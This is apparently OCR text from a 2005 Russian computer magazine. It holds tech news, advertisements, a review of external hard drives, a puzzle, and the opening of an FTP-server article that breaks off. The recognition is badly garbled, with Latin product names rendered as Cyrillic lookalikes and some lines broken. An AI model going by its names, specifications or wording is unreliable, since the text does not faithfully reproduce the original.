такого настоящие 
ценители не могли, платный ролик скачала куча народу. Многие 
удивлялись, с чего это небедному Фреду сниматься в низкока- 
чественной порнушке? Как оказалось позже, ролик этот музы- 
кант снял для себя в 2003 году и хранил на своем компе. Но до 
компьютера добрались хакеры, ролик старабанили и продали 
порномагнатам, которые, недолго думая, пустили его в дело. 
Фред, узнав о том, что его прелестями любуется чуть ли не пол- 
мира, пришел в бешенство и подал на владельцев сайтов в суд. 
А в качестве компенсации потребовал 70 миллионов и всю ту 
прибыль, которую принесли его мелькающие ягодицы. Типа того, 
что была нарушена неприкосновенность его личной жизни, а 
имя незаконно использовано для наживы. Среди ответчиков на- 
ходятся такие организации, как РеегІ ІЧеі\л/огк, 0а\л/кег Месііа, 
Роасігиппег Ресогсіз, Ниггісапе ЕІесігіс, Зегѵіпі Іпіегпеі Зегѵісез, 
ТБе РІапеі Іпіегпеі Зегѵісез, ТіеггаІЧеі, Еѵегуопе'з Іпіегпеі, Ѵегіо, 
Тугопе ІЧоггіз. Некоторые из них не имеют отношения к порнобиз- 
несу, но использовали ролик для привлечения на свой сайт пок- 
лонников Ытр Віікіі. 





ПОЙМАЙ, ЕСЛИ СМОЖЕШЬ! 



Разыгрываются 5 цветных лазерных принтеров! 



Сотни призов каждый месяц - 5 шансов на выигрыш 
Смотрите условия на специальных упаковках с эмблемой акции 



В каждой упаковке Оідііех с эмблемой 
ищите шанс выиграть один из тысячи 
фантастических призов - включая 
великолепный настольный цветной 
принтер 0КІ С3100 - каждый месяц! 

Чтобы стать претендентом, просто 
присоединяйтесь к нашему розыгрышу. 
Это элементарно! Помните - чем раньше 
начнёте, тем больше шансов на выигрыш. 
А играть Вы можете сколько угодно! 

С апреля по август 2005, мы дарим Вам 
ЗоІТ'п'ЗІтопд ІЭ5В Оідііех, МРЗ плееры, 
коврики для мыши и ещё много, много 
всего в наших захватывающих 
ежемесячных розыгрышах. 



Присоединяйтесь! Найдите одну из 
упаковок Оідііех с эмблемой - 
и Вы можете стать 




от визиток до баннеров 
длиной 1,2 метра! 



СМОТРИТЕ ПОДРОБНОСТИ АКЦИИ НА ѴѴѴѴѴѴ.0ІСІТЕХ.КІІ 







НАІЮЫЕѴѴЗ ▼ 



П РОТИ ВОУ ДАРН АЯ 
ФЛЕШКА 

Забавную штуковину на СеВІТ-2005 представила компания ЭідіГех — 
ІІЗВ-флешку ЗоІТ'п'ЗГгопд. Что в нем забавного? С одной стороны, 
это обычная ІІЗВ 2.0 флешка с объемом от 128 Мб до одного гига- 
байта. Но если кинуть эту штуку с полутора метров в лужу на ас- 
фальте, то можно не опасаться за данные, поскольку новинке не 
страшны ни падения, ни погружения в воду. Вот основные специфи- 
кации устройства: 

Максимальная глубина погружения: 1 м 

Максимальная температура хранения данных: 80 градусов 

Максимальная высота падения: 1,5 м 

Скорость чтения данных: 10 Мб/с 

Скорость записи данных: 7 Мб/с 



Новинка поставляется в вариантах емкостью 128 Мб, 256 Мб, 512 
Мб и 1 Гб. В комплекте с флешкой идет диск с софтиной, которая 
дает пользователю возможность созда- 
вать защищенные паролем разделы 
флеш-диска. Кроме того, с помощью 
этой утилиты можно сконфигурировать 
флешку таким образом, чтобы использо- 
вать ее в качестве загрузочного диска. 




ПРИЯТНЫЙ А81І8 

Приятный мониторчик АгізГо 
РМ17ТЗ выпустила на днях ком- 
пания Азиз. Этот 17-дюймовый 
жидкокристаллический дисп- 
лей имеет отличный дизайн и вы- 
полнен, как отмечается в пресс- 
релизе компании, «в стиле сгла- 
женных углов». Под экраном 
расположены два динамика и 
кнопки управления. Новинка по- 
зиционируется как дисплей для 
ЬагеЬопе-систем А51І5 ТегтіпаГог 2, РипсІіГ-Р и З-ргеззо. Основание 
РМ17Т5 выполнено из алюминиевого сплава — прочного и легкого 
материала. Среди прочего, меня очень порадовал тот факт, что 
Азиз дает гарантию отсутствия ярких точек 7его ВгідГіГ ЭоГ Роіісу: ес- 
ли в течение трех месяцев с даты покупки пользователь обнаружит 
на экране хоть одну противную яркую точку, монитор будет заме- 
нен. Вот основные технические характеристики новинки: 

Максимальное разрешение: ЗХОА 1280x1024 

Яркость (тах): 400ссІ/т2 

Контраст (тах): 600:1 

Угол обзора (Ь/ѵ): 140/140 

Время отклика (оп/оІІ): 8 мс 

Входы: РѴІ-Р, Р-зиЬ 

Аудио: два стереодинамика 2,5 Вт 

Размеры: 390x414x176 мм, 4,4 кг 










МОБИЛЬНЫЙ 

штои 

АІѴЮ недавно официальным пресс-релизом представила свою 
новую платформу для мобильных компьютеров Тигіоп 64. По ана- 
логии с интеловским СепГгіпо МоЬіІе технология АІѴЮ состоит из 
трех компонентов: центрального процессора, микросхем базо- 
вой логики и модуля беспроводной связи. Правда, чипсет и ѵуі-И- 
микросхема будут поставляться другими производителями. 
Кристаллы Тигіоп 64 основаны на новом ядре І_апсазГег, которое про- 
изводится с соблюдением норм 90 нм техпроцесса. Они под держи- 
вают набор инструкций ЗЗЕЗ, что роднит их с последними серверны- 
ми моделями. Площадь кристалла составляет 115 мм 2 , количество 
транзисторов — 114 млн, и используется слот 754-ріп тРОА. 

В представленной линейке есть несколько кристаллов, все они 
различаются частотами работы, тепловыделением и объемом кэш- 
памяти. Одновременно с этим все модели оборудованы однока- 
нальным контроллером памяти и 800 МГц шиной НурегТгапзрогГ. Раз- 
личия, как и полагается, отражены в названиях моделей. Так, Гигіоп 
64 МТ-хх потребляет 25 Вт, в то время как МІ_-модификация — 35 из-за 
встроенного контроллера памяти; последние две цифры марки- 
ровки отражают производительность моделей. Следуя лучшим тра- 
дициям, Тигіоп 64 поддерживает технологию энергосбережения 
Ро\л/егІ\Іо\л/і, защиту от переполнения буфера ЕѴР (ЕпГюпсесі Ѵігиз 
РгоГесГіоп) и работу с 64-разрядным софтом. АІѴЮ Тигіоп 64 МоЬіІе 
планируется использовать в качестве основы для компактных ноут- 
буков. Уже сейчас на рынке начали появляться предложения от 
АЗІІ8, Асег, ЕиііГзи и ВепО, работающих на этой платформе. 



ТѴѴММ08 ПРЫГАЕТ 
ВЫШЕ ГОЛОВЫ 



В ходе выставки СеВІТ- 
2005 компания ТѵуіпМОЗ 
продемонстрировала 
публике новые модули 
памяти ЭЭК2-800 МГц 
ЭРАМ и заодно установила новый рекорд производительности. 
На своем стенде инженеры компании продемонстрировали 
комп с установленными модулями ЭЭР2-800 и лихо утверждали, 
что их компьютер самый быстрый на СеВІТ в этом году. 

Система, которую показывали на выставке, использует модули 
памяти ЭЭР2-800, системную плату АВІТ РаТа1 1 Ту АА8ХЕ, в кото- 
рой тактовая частота памяти разогнана до 770 МГц. Кроме то- 
го, система построена на базе ІпГеІ РепГіит 4 ЕхГгете ЕсііГіоп с 
номинальной тактовой частотой 3,73 ГГц (утверждается, что 
процессор разогнан до 5,4 ГГц). По ожиданиям аналитиков, 
штучное производство модулей ЭЭР2-800 начнется в июне и 
продажи будут ориентированы на маньяков-оверклокеров. 
Фигня в том, что пока на рынке нет чипсетов, нормально под- 
держивающих такую частоту. И конечно, выпускать такие мо- 
дули серийно нет никакого смысла. 




НОЛ-ПЛЕЕР 



НОУТ НА ТЦВІОЫ 64 

На СеВІТ-2005 компания АЗІІ5 продемонстрировала публике 
свой ноутбук А6000К, функционирующий на базе новой плат- 
формы Тигіоп 64. Вот основные характеристики этой интерес- 
ной новинки: 

Процессор АМР Тигіоп 64 2800+ или 3000+ (1 Мб І_2 кэш), с тепловыделением 25 Вт 

15" или 15,4" ЮР-экран 

64 Мб (Зеіогсе 6200 (Зо 

До 2 Гб памяти РРР-333 

Беспроводная сеть на 802.11 Ь/д или а/Ь/д 

Встроенная веб-камера 



ОТ 8АМ81ІІІС 

Всем известная кампания Затзипд решила не отставать от 
лидеров по производству НЮЭ-плееров и выпустила две новые 
модели. Затзипд ѴН-92505 и ѴН820-МС. ѴН-925ѲЗ 
предназначается тем, кому важен объем памяти, он составляет 
целых 20 Гб. Теперь ты точно сможешь залить всю свою любимою 
музыку на плеер и ни в чем себе не отказывать. Вторая модель 
имеет размеры немного больше флеш-плеера, но в ее недрах ты 
найдешь хард на 5 Гб. Из особенностей этих девайсов стоит 
отметить цветной дисплей на 65000 цветов размером 1,8 и 1,5 
дюйма соответственно и продолжительное время автономной 
работы по 10 и 8 часов. 








НДОДОИ стильный дизайн 
Ргіи** ѴѴЁЗТ отражает то, 
чт и) ценишь а этой чарку: 

динами +ад драна и яркую 
•л ни виду а л ьность , 

А вкус сигарет ѴѴЁЗТ, 
н^шенмо й агаты й 

1 Н,[ ь ш< ины и 
О ГТ ДЯ<5 Р Н Р ІІ* + И И м 
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МИНЗДРАВ РОССИИ ПРЕДУПРЕЖДАЕТ КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 





Алексей Шуваев, Іез'МаЬ (іез^ІаЬѲдатеІапсІ.ги) 

ВНЕШНИЕ 




В НАШЕЙ ЖИЗНИ РЕГУЛЯРНО ПРОИС- 
ХОДЯТ НЕПРИЯТНОСТИ. ОДНОЙ ИЗ 
НИХ, СВЯЗАННОЙ С КОМПЬЮТЕР- 
НЫМ МИРОМ, ЯВЛЯЕТСЯ ПОТЕ- 
РЯ ИНФОРМАЦИИ. ЛУЧШИМ 
СПОСОБОМ СОХРАНЕНИЯ 
ДАННЫХ ЯВЛЯЕТСЯ ЧЕЛО- 
ВЕЧЕСКАЯ ПАМЯТЬ, НО 
КОГДА ТВОЯ ГОЛОВА ПУХ- 
НЕТ ОТ ТЕЛЕФОННЫХ НО- 
МЕРОВ И СЧЕТОВ, НА ПО- 
МОЩЬ ПРИХОДИТ КОМПЬ- 
ЮТЕР. ДАБЫ УМЕНЬШИТЬ 
РИСК ПОТЕРИ ДАННЫХ, 

ВСЕ СЕРЬЕЗНЫЕ ОРГАНИ- 
ЗАЦИИ ИСПОЛЬЗУЮТ 
ВАСКІІР-СИСТЕМЫ. НУ А 
ЧЕМ ТЫ ХУЖЕ? СЕГОДНЯ 
МЫ РАССМОТРИМ ЕМКО- 
СТНЫЕ ДИСКИ ВО ВНЕШ- 
НЕМ ИСПОЛНЕНИИ, КО- 
ТОРЫЕ МОГУТ ПОСЛУ- 
ЖИТЬ НЕ ТОЛЬКО ДЛЯ 
БЭКАПА ВСЕХ ТВОИХ 
ЛИЧНЫХ ДАННЫХ, 

НО И ДЛЯ ПЕРЕ- 
НОСА ИНФОРМА- 
ЦИИ НА КОМП 
ТВОЕГО ДРУ- 
ГА I 




$ 



ІМахІог Опе ТоисМ 2 I ѴѴезІегп Оідііаі ѴѴОХС2500ЛЗ I 
ѴѴезІегп Оідііаі ѴѴОХР2500ЛЗ I Зеадаіе ІІЗВ 2.0 РогІаЫе 
Ехіѳгпаі НагсІ Огіѵѳ I 2ІѴ2 I Хітѳіа КіѳЮізк I 
Зеадаіе УЗВ 2.0 Роскеі НагсІ Огіѵе I Тгапзсепсі РІюІоВапк I 



Сохрани все и поделись с другом 

[сколько вешать...] Тема бэкапа актуальна всегда и везде. Доста- 
точно войти на любой поисковик, набрать «Ьаскир», и сразу ста- 
новится ясно, скольких людей занимает эта тема. Основные выс- 
казывания будут в духе «Какой же я лопух» и «Не повторяйте моих 
ошибок». Поэтому принимаем: резервному копированию — быть. 
Теперь стоит определиться, на какой объем рассчитывать. Брать 
меньше 40 гигабайт смысла нет, так как желательно иметь нес- 
колько точек восстановления. Если ты держишь свой сервер или 
просто хочешь менее чем за час восстановить системный диск, 
не стоит закидывать туда всю коллекцию музыки и видео, но же- 
лательно иметь несколько бэкапов по разным датам. Отсюда де- 
лаем вывод: брать надо не менее 100 Гб. Итак, мы определились 
с объемом данных и будем обращать внимание на технологич- 
ность и упакованность наших игрушек различными функциями. 

[технология] Современные внешние винчестеры имеют два ос- 
новных интерфейса с компьютером: ІІЗВ 2.0 и ЕігеѴѴіге. Конечно, 
более популярны ИОО на основе ІІЗВ, так как этот интерфейс есть 
абсолютно на всех материнских платах, а РігеѴѴіге лишь относи- 
тельно недавно начали применять при создании системной логи- 
ки. К счастью, производители создают свои винчестеры, сохра- 
няя оба вида подключения, так что выбирать предстоит тебе са- 
мому. Между ІЕЕЕ1394 и ІІЗВ 2.0 разницы особой ты не заметишь, 
так как передача данных ограничена скоростными показателя- 
ми самого винчестера. Довольно часто внешние девайсы созда- 
ются на базе серийных моделей ИОО, к которым просто добавля- 
ют контроллер и пару-тройку кнопок, на которые вешают включе- 
ние, резервное копирование или какое-нибудь действие на ус- 
мотрение производителя или владельца (софт, идущий в комплек- 
те, зачастую позволяет перенастроить функции кнопок на устрой- 
стве). Чтобы не создавать нагрузку в плане питания, многие вин- 
честеры имеют собственный выносной блок, который потребует- 
ся подключить, так что позаботься о свободной розетке заранее. 

[бэкап и мобильность] Хоть многие внешние винчестеры и име- 
ют кнопку «Бэкап», но надо признать, что они проигрывают по 
продолжительности жизни внутренним. Это связано хотя бы с 
тем, что их часто переносят, роняют, трясут. ИОО в тесном кор- 
пусе то и дело перегревается. Внешний источник питания ста- 
билизирован намного хуже, чем компьютерный, и электроника 
винта подвержена частым скачкам напряжения. ІІЗВ-интер- 
фейс довольно часто отходит, что вредно как при записи на 



винт, так и в том случае, когда ЕЮЭ питается от ІІЗВ-шины. 

Зато производители стараются сделать мобильные ИОО более 
живучими, применяя всевозможные противоударные техноло- 
гии. Правда, частенько стремление к компактности все же пе- 
ревешивает. 

Обычно внешние винты используют для переноса большого коли- 
чества данных с одного компа на другой. Хотя использование их 
для бэкапа все более оправдано. 

[что ты получишь за свои деньги] Нередко внутри внешнего ИОО 
находится обычный серийный ЮЕ-винчестер для РС или ноутбука. 
Это дает надежду в будущем при необходимости вставить в ко- 
робку носитель поновее. Однако в этом случае ты, скорее всего, 
потеряешь гарантию, поэтому для таких целей лучше купить ИОО- 
Раск (пустую коробку с ІІЗВ-интерфейсом, в которую можно вста- 
вить практически любой серийный НЭЭ). 

Если ты планируешь работать с большим количеством маленьких 
файлов, то будет полезен восьмимегабайтный буфер. Производи- 
тель может прикрепить к устройству флешридер или оснастить 
его сверхпрочным корпусом, что немаловажно для переносного 
девайса. 

Помни, что современные шустрые винты выделяют при работе не- 
мало тепла, и присмотрись внимательно: если корпус металли- 
ческий (фактически, радиатор) или имеет множество вентилиру- 
ющих отверстий — его можно брать для активной и длительной 
работы. Ведь, чтобы скопировать 200 Гб фильмов у твоего прияте- 
ля, винчестеру потребуется не один час активной работы, и наг- 
реется он неслабо. 

[как мы тестировали] Тест происходил в реальных условиях: 

Щ Мы носили винчестеры по улице, в том числе и на морозе. 

Ц] Пробовали подключать к разным компьютерам. 

[з] Копировали множество маленьких и больших файлов. 

И Исследовали особенности чтения программой ѴѴіпВепсГі. 

[б] Изучали специальные возможности устройств. 

И Оценивали качество сборки. 

Все винты подключались по ІІЗВ 2.0, как самому распространен- 
ному интерфейсу. Кстати, запомни: после возвращения домой с 
мороза нужно дать винчестеру согреться до комнатной темпера- 
туры, не то рискуешь обзавестись битым железом © 



ТЕ5Т_І_АВ ВЫРАЖАЕТ БЛАГОДАРНОСТЬ ЗА ПРЕДОСТАВ- 
ЛЕННОЕ НА ТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ КОМПА- 
НИЯМ ІІЗЫ СОМР1ЯЕП5 (Т. (095) 775-8202, уѵуѵѵѵ.изп.ги), 
ІЫРВІСЕ (Т. (095) 748-3688, и /ѵѵѵѵ.іпргісе.ги), А ТАКЖЕ РОС- 
СИЙСКИМ ПРЕДСТАВИТЕЛЬСТВАМ КОМПАНИЙ МАХТОР, 
ЗЕАОАТЕ И ѴѴЕЗТЕВЫ 0ЮІТАІ_. 



[хакер 04 [76] 05 015 ] 
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Махіог Опе ТоисИ 2 

Емкость: 250 Гб 

Интерфейс подключения 

к компьютеру: Ц5В 2.0, 2хГігеѴѴіге 

Внешнее питание: есть 
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Первый девайс в нашем тесте. 
Внешность предельно лаконична и 
дает понять, что собран он для 
серьезной работы. Передняя па- 
нель всего с одной кнопкой — ак- 
тивация бэкапа. Она же играет 
роль индикатора включения и ра- 
боты диска, благодаря двум свето- 
диодам, которые перемигиваются 
при передаче данных. На задней 
панели располагаются все штеке- 
ры: питание, два порта РігеѴѴіге и 
один порт 1)$В. Есть также выключа- 
тель питания и отверстие вентиля- 
ции. Корпус выполнен из металла, 
что дает право рассчитывать на хо- 
рошее охлаждение — и правда, 
при активной работе о корпус 
можно даже греться. Минусом яв- 
ляется то, что он довольно долго 
согревается после похода с ним 
по морозу. В работе девайс пока- 
зал себя неплохо. Лишь скачки 
напряжения (включение холодиль- 
ника) вызывали сбой устройства и 
переопределение его заново опе- 
рационной системой. Грешить 
здесь можно только на блок пита- 
ния. Замечено было, что при дли- 
тельной работе в несколько пото- 
ков (копирование с диска сразу 
нескольких файлов) устройство по- 
висало и прекращало работать. 
Лечилось только выключением и 
повторным включением питания. 
Возможно, это особенность конк- 
ретного экземпляра. 



Зеадаіе ІІЗВ 2.0 
Роскеі НагсІ Огіѵе 

Емкость: 5 Гб 

Интерфейс подключения 

к компьютеру: 115В 2.0 

Внешнее питание: нет 
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Еще один представитель внешних 
накопителей от компании Зеадаіе. 
На этот раз мы имеем модель кар- 
манного типа «емкая дискета». Не- 
большой по размерам, но доста- 
точно стильный девайс выполнен в 
форме шайбы или измерительной 
рулетки, в которой прячется не толь- 
ко маленький ГЮЭ, но и кабель 
подключения к ІІЗВ. Внешнего пита- 
ния не нужно, так что ты имеешь 
шанс получить маленький, но емкий 
накопитель, который не требует 
лишней возни и наличия дополни- 
тельных проводов. Винчестер на 
3600 оборотов в минуту емкостью в 5 
Гб не претендует на звание высо- 
копроизводительной системы, но 
загнать на него пяток фильмов или 
целый ЭѴЭ ты можешь легко. В цент- 
ре корпуса расположен голубой 
светодиод, который ярко загорает- 
ся при каждом обращении к вин- 
честеру. Прорезиненное основа- 
ние не даст соскользнуть этому кро- 
хотному винту со стола. Ну а пос- 
кольку ты человек, активный во всем, 
производитель предусмотрел за- 
щиту ГЮЭ от толчков и сотрясений. 
Когда будешь хвастать перед друзь- 
ями покупкой, не забудь упомянуть, 
что девайс основан на базе одно- 
дюймового жесткого диска и весит 
при этом 63 грамма, так что полней- 
шая минимизация не за горами. 



ТгапасепсІ 

РГіоІоВапк 

Емкость: 20, 40 Гб 

Интерфейс подключения 

к компьютеру: ІІЗВ 1.1, 2.0 

Внешнее питание: зарядное устройство 
<®> <§> • • ф 



Сие есть даже не совсем винчес- 
тер, а целая система, которая 
приглянется абсолютно всем, кто 
имеет дело с большими объемами 
данных. Данный комбайн сочетает 
в себе мобильный винчестер малых 
размеров, флешридер и систему 
архивирования данных. Внешне по- 
хожий на современные МРЗ-ЕЮО 
плееры, он не умеет воспроизво- 
дить файлы, зато обладает встро- 
енным Ы-Іоп аккумулятором (2200 
тАГі), которого хватит на 3 часа 
непрерывной работы. Список под- 
держиваемых флеш-карт велик и 
включает почти все носители: СЕ 
Іуре І/ІІ, ВМС, ІВМ Місгосіпѵе, 50, 
ММС, М3, М3 РІЮ. Благодаря воз- 
можности автономной работы, ты 
можешь взять его с собой в дорогу 
и скидывать на него данные с 
флеш-карты по мере необходи- 
мости. Также можно копировать на 
карту данные, например если за- 
хотел обновить коллекцию музыки 
на флешке. В коробочке был най- 
ден удобный кожаный чехол, приз- 
ванный защитить девайс от всех 
неприятностей окружающего ми- 
ра, и зарядное устройство, так как 
автоматически заряжаться от ІІЗВ 
он не обучен. 



Зеадаіе ІІЗВ 2.0 
РогіаЫе ЕхіегпаІ 
НагсІ Огіѵе 

Емкость: 200 Гб 

Интерфейс подключения 
к компьютеру: ІІЗВ 2.0, 2хГіге\Л/іге 

Внешнее питание: есть 
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При первом взгляде накопитель вы- 
зывает воспоминания о существо- 
вавшей когда-то приставке 
ІЧІіпІепсІобД — уж очень похож. Сгла- 
женные углы, эдакий интеллектуаль- 
ный кубик. Вентиляционные отверс- 
тия на боковых гранях не допустят 
перегрева винчестера. Дизайн уст- 
ройства можно считать удовлетво- 
рительным, непонятно лишь, зачем 
было делать девайс столь объем- 
ным. Два синих светодиода на пе- 
редней панели информируют о 
включении и процессе передачи 
информации синим свечением. Тут 
же присутствует кнопка резервного 
копирования. В процессе жестокой 
эксплуатации винчестер держался 
молодцом и практически не издавал 
шумов при работе. На задней пане- 
ли был обнаружен выключатель, 
порт ІІЗВ и два порта РігеѴѴіге. Хоте- 
лось бы пожелать производителю 
добавить каких-нибудь мультиме- 
дийных возможностей, вроде флеш- 
ридера или ОѴО-РѴѴ, и тогда смело 
можно будет покупать комбайн для 
резервного копирования ЭѴЭ, да и 
такие огромные габариты это бы оп- 
равдало. В общем, можно считать 
накопитель удавшимся и порадо- 
ваться за владельцев этого гаджета. 



Помни о постоянно растущих объемах винчестеров: через год-два твои 100 Гб будут просто смешны.1 Г Если тебе нужен высокопроизводительный внешний диск и ты хочешь расшарить к нему доступ 
Советуем сразу прикупить винт пообъемнее или узнать о возможности замены носителя более емким. ] [по сети, присмотрись к моделям с большим буфером мегабайт на восемь. 
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1 Хітеіа МеШі$к 


Емкость: 20, 40, 60, 80, 100 Гб 


Емкость: 120 Гб 


Интерфейс подключения 
к компьютеру: ІІЗВ 2.0 


Интерфейс подключения 
к компьютеру: ІІЗВ 2.0, ЕТГіегпеТ 


Внешнее питание: нет 


Внешнее питание: есть 
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Довольно давно на рынке внешних 
накопителей присутствует компа- 
ния, выпускающая свою продук- 
цию под именем 2ІѴ. Модельный 
ряд неуклонно расширяется, и се- 
годня в наши руки попал 2ІѴ2. 
Внешне неотличимый от собрать- 
ев, он выделяется в работе благо- 
даря изменившему цвет с зеленого 
на синий светодиоду-индикатору. 
Небольшой, помещающийся в кар- 
ман рубашки девайс напоминает 
своим весом, что это все-таки на- 
копитель. Металлический корпус 
защитит винчестер от поврежде- 
ний. Как и повелось, у этой модели 
присутствует цепочка с прищеп- 
кой, которую советуем расцени- 
вать лишь как украшение. Отличие 
от остальных моделей заключает- 
ся в применении нового чипа, кото- 
рый обеспечивает поддержку АТА 
6 и гарантирует нам полноценную 
работу в ШТгаЭМА 4. Кстати, пок- 
лонникам Ыпих он особенно пон- 
равится, так как на него легко мож- 
но установить эту операционку и 
грузиться прямо с внешнего вин- 
честера по необходимости. В ме- 
ру шумный и не слишком греющий- 
ся в работе, он отлично подойдет 
тем, кто хочет иметь при себе не- 
большой, но емкий носитель. 



Этот накопитель выделяется на фо- 
не остальных своими возможностя- 
ми, которые видны из названия — 
этот диск является сетевым. Благо- 
даря ЕТГіегпеТ-контроллеру, можно 
подключить этот носитель к сети и 
без компьютера. Помимо этого, су- 
ществует возможность разграни- 
чения уровня доступа к папкам 
винчестера. В любой локалке су- 
ществует сервер, который обеспе- 
чивает пользователей музыкой, 
софтом и фильмами. Ради всего 
этого админы сети мучаются с 
настройкой железа и сервисов, не 
подозревая об устройстве, кото- 
рое уже готово для этой работы. 
Единственной проблемой может 
оказаться емкость носителя, но 
никто не запрещает тебе заменить 
винчестер на более емкий (но уч- 
ти, что ты все делаешь на свой 
страх и риск). Внешнее оформле- 
ние накопителя считаем удовлет- 
ворительным, разочаровал лишь 
материал корпуса, который час- 
тично изготовлен из пластика и мо- 
жет треснуть при первом падении. 
Помимо гнезд подключения на де- 
вайсе есть выключатель. Внешний 
блок питания имеет вилку с узкими 
контактами, так что при покупке 
проследи, чтобы был переходник. 
Также к минусам можно отнести 
буфер всего на 2 Мб, что для сете- 
вого диска маловато. 



ѴѴезІегп Рідііаі 
ѴѴРХР2500 В 

Емкость: 250 Гб 

Интерфейс подключения 
к компьютеру: 3x115В 2.0, 2хРіге\Л/іге 

Внешнее питание: есть 
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Монстр функциональности среди 
своих собратьев. Данный винчес- 
тер отѴѴезТегп ЭідіТаІ порадует сво- 
его владельца встроенным флеш- 
ридером на восемь самых расп- 
ространенных типов карт. Корпус 
выполнен из пластика, и создается 
впечатление, что он вряд ли выдер- 
жит хотя бы одно падение со стола 
на пол. Общий вид изделия понра- 
вился. Эргономичность на высоте: 
отверстия вентиляции есть на ниж- 
ней и верхней крышках. На перед- 
ней панели чуть притоплены, чтобы 
не нажать случайно, три кнопки: 
включение накопителя (горит си- 
ним светом и мигает при передаче 
данных), синхронизация и полное 
копирование данных с флеш-кар- 
ты. Последняя функция очень удоб- 
на: нет необходимости включать 
компьютер, чтобы скопировать со- 
держимое флешки. Данный вин- 
честер примечателен еще и тем, 
что он выполняет роль ІІЗВ-хаба, 
имея на борту два свободных пор- 
та ІІЗВ — по третьему он подключа- 
ется к компьютеру. В процессе 
эксплуатации винчестер немного 
нагревается, но благодаря венти- 
ляционным отверстиям охлаждает- 
ся нормально. Немного расстрои- 
ли размеры накопителя, но нали- 
чие флешридера оправдывает 
увеличение габаритов в длину. 



ѴѴезІегп йідііаі 
Ѵ\ШХС250(ЫВ 

Емкость: 250 Гб 

Интерфейс подключения 
к компьютеру: ІІЗВ 2.0, 2хЕіге\Л/іге 

Внешнее питание: есть 
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Данный внешний винчестер имеет 
на своем борту 250 Гб и 8 Мб бу- 
фер памяти. Примечательно, что 
выполнен он несколько нестанда- 
ртно: полностью прозрачный блок 
из пластика с подсветкой красны- 
ми трубками и синими светодиода- 
ми. В полной темноте девайс при- 
тягивает всеобщее внимание. 
Свою работу он демонстрирует 
двумя светодиодами на передней 
панели. В нижней части и на зад- 
ней стенке выполнены вентиляци- 
онные отверстия. Следует отме- 
тить, что в течение всего теста, а 
это несколько часов интенсивной 
работы, винчестер нагрелся не 
сильно и работал стабильно, ра- 
дуя скоростью передачи данных и 
ярким свечением. Никакими внеш- 
ними кнопками это чудо дизайне- 
рской мысли не обладает, есть 
лишь четыре выхода на задней па- 
нели: питание, ГігеѴѴіге и 2хІІ5В. 
Кропотливая работа над внеш- 
ностью устройства дает понять, что 
девайс предназначен в первую 
очередь для работы на публику, 
что дает повод прийти к приятелю 
за новой порцией фильмов. Общее 
впечатление осталось хорошим, 
страшно лишь за сохранность 
всей этой красоты, если случится 
винчестеру упасть. 
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Позаботься о качественном питании для внешнего диска, так как включение мощных бытовых 
приборов может спровоцировать сбой в работе носителя. 





Правила игры: N 

Разгадай квест, который придумали профессор Куттер и его 
научный сотрудник Бублик. Пройдя квест до конца, ты найдешь 
обезьянку (только, чур, не смотреть в правый нижний угол). 

Пункт 1-2. Ищи первое слово. Его координаты: страница 15, 
столбец 1 , восьмая строка, пятое слово. 

Пункт 2-3. Ищи первую часть второго слова. Ее координаты: 
страница 157, столбец 1, двадцать первая строка, шестое слово. 
Пункт 3-4. Ищи вторую часть второго слова. Ее координаты: 
страница 76, столбец 2, сорок пятая строка снизу, третье слово 
(последние три буквы). 

Пункт 4. Теперь открой вторую страницу и найди маленький 
рисунок в нижнем правом углу. Ты найдешь точно такую же 
обезьянку, как и здесь. Поздравляю. 






ѵѵѵѵѵѵ.азизпЬ. ги 



НЕАРТОРТЕСНЫОЮеУ 



^Весь Мир 

у Вас в Кармане 

Первый КПК со Встроенной 1.3-Мегапиксельной Цифровой Камерой 

Пора забыть 
о ноутбуке, 
цифровой камере, 

МРЗ ппеере 
и диктофоне •••• 

АШ МѴР/І I А730 
заменит осе это. 





Р/1 1- Роскеі РС 

А730 


1 ^ Встроенная цифровая камера З) Производительность 

с разрешением 1.3 мегапикселя и возможности расширения 

■Первая встроенная камера с разрешением 1.3 - модель оснащена новейшим процессором Іпіеі РХА270 

мегапикселя с функциями видеокамеры! - поддержка технологии Віиеіооііп, 118В 

■Трансфлективный ТРТ ЖК-дисплей 3.7" в качестве и слот расширения СР/ЗйІО 

видоискателя - гораздо больше, чем у любой камеры 


Первый КПК со Встроенной 

1.3-Мегапиксепьной Цифру 


Большой ѴОА-дисплей 
с высоким разрешением 

■ѴОА-дисплей 3.7" с разрешением 640x480 прекрасно подходит 
для работы с графическими и видео-приложениями 

■Функция разворота экрана на 90? позволяет более комфортно Г арантия 1 ГОД 

работать с документами и в Интернете Служба технической поддержки азіі5@ггс.ги 



НРС Тел: (095) 956-1717, 133-5320; Факс: (095) 133-5230; ѴѴеЬ: ѵѵѵѵѵѵ. ггс. ги 
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РТР-кухня 




ПРОТОКОЛ ПЕРЕДАЧИ ФАЙЛОВ РТР ЯВЛЯЕТ- 
СЯ ОДНИМ ИЗ СТАРЕЙШИХ ПРОТОКОЛОВ ИН- 
ТЕРНЕТА. МЫ ИСПОЛЬЗУЕМ ЕГО ПОСТОЯННО: 
ДЛЯ ДОСТУПА К ТОННАМ ВАРЕЗА В СЕТИ, 
ЗАКАЧКИ ВЕБ-САЙТА НА СЕРВЕР, ОБМЕНА 
БОЛЬШИМИ ФАЙЛАМИ. РАНО ИЛИ ПОЗДНО, 

НО КАЖДЫЙ ИЗ НАС СТАЛКИВАЕТСЯ С ПРОБ- 
ЛЕМОЙ ВЫБОРА ПОДХОДЯЩЕГО СОФТА ДЛЯ 
ОРГАНИЗАЦИИ СВОЕГО СОБСТВЕННОГО РТР- 
СЕРВАКА. И ЭТОТ ВЫБОР НЕ ВСЕГДА ОДНОЗ- 
НАЧЕН. СЕГОДНЯ МЫ ПРОТЕСТИРУЕМ САМЫЕ 
ЛУЧШИЕ ПРОГРАММЫ, А ЗАОДНО ПОСМОТ- 
РИМ, ЧТО ПРЕДСТАВЛЯЕТ СОБОЙ САМ ПРО- 
ТОКОЛ РТР I Степан Ильин ака ЗІер (зТер@геаІ. хакер. ш) 



Протокол РТР и тест-драйв 
пошлярн^х РТР-серверов 

ъ] Прот окол РТР (Рііе ТгапзРег Ргоіосоі), каким 
ем сейчрст^ВЖілся отнюдь не сразу. Первые разра- 
для передачи файлов датируются еще 1971 го- 
м. С тех пор ег^^аюлько раз обновляли и вносили в стандарт 
юктивьі^^^^^^^Ьь^рвсе практически полностью перера- 

лт ИР был целиком описан в 

